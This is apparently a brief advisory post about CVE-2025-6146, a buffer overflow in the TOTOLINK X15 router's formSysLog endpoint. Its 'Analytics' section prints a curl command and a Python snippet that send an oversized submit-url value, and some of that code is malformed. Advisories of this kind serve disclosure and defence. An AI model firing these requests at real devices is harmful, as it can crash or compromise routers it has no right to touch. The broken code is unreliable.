TOTOLINK X15, Buffer Overflow Vulnerability, CVE-2025-6146 (Critical)

Listen to this Post

How the CVE Works

CVE-2025-6146 is a critical buffer overflow vulnerability in TOTOLINK X15 firmware version 1.0.0-B20230714.1105. The flaw exists in the HTTP POST request handler within the `/boafrm/formSysLog` endpoint. Attackers can exploit this by sending a specially crafted POST request with an oversized `submit-url` argument, overflowing the buffer and potentially allowing remote code execution. The vulnerability is remotely exploitable, and public disclosure increases the risk of active exploitation.

DailyCVE Form

Platform: TOTOLINK X15
Version: 1.0.0-B20230714.1105
Vulnerability: Buffer Overflow
Severity: Critical
Date: 06/23/2025

Prediction: Patch by 07/15/2025

What Undercode Say

Analytics:

curl -X POST -d "submit-url=$(python -c 'print("A"1000)')" http://target/boafrm/formSysLog
import requests
payload = "A" 1000
requests.post("http://target/boafrm/formSysLog", data={"submit-url": payload})

How Exploit

  • Craft oversized `submit-url` in POST request.
  • Trigger buffer overflow for RCE.

Protection from this CVE

  • Apply vendor patch.
  • Disable remote management.
  • Use network segmentation.

Impact

  • Remote code execution.
  • Device compromise.
  • Unauthorized access.

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top